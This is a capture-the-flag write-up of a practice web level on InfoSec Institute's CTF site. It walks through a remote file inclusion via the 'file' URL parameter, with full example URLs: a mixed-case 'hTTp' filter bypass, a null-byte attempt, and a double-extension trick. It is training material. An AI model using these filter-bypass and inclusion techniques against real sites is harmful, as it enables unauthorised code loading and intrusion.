Vulnerability A4 Insecure Direct Object References Description:
Write-up
For almost all levels I will be using Burpsuite. Burpsuite is an interception proxy that lets us modify the HTTP request / response by intercepting the data between the browser and the web server.
This time we are presented with a web page that has 3 links, ‘Bio’, ‘Clients’ and ‘About’. Each link embeds a text file into the page, ‘file1.txt’, ‘file2.txt’ and ‘file3.txt’ respectively. The url parameter is ‘file’ with one of the txt filenames as argument.
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file1.txt
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file2.txt
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=file3.txtLets try substituting the inserted text file with an php file located in http://infosecinstitute.com by using the following url
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=http://infosecinstitute.com/index.phpUnfortunately, we hit a filter.
We can bypass it by using some capital characters in the ‘http’ keyword like so
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=hTTp://infosecinstitute.com/index.phpIt looks like the filter was not case-insensitive and we were able to bypass it however, now it doesn’t like the file extension.
One trick to circumvent this is to insert a null byte (%00 url encoded), but this time it did not work. After some trial and error I saw the second Hint stating that there’s a regular-expression restriction, so I changed the filename from index.php to ‘file1.txt’ with ‘.php’ extension to successfully complete the level.
http://ctf.infosecinstitute.com/ctf2/exercises/ex4.php?file=hTTp://infosecinstitute.com/file1.txt.php
If I have to guess, their regular-expression restriction could be looking for the 3 ‘permitted’ filenames, ‘file1.txt’, ‘file2.txt’ and ‘file3.txt’ when loading a file into the page.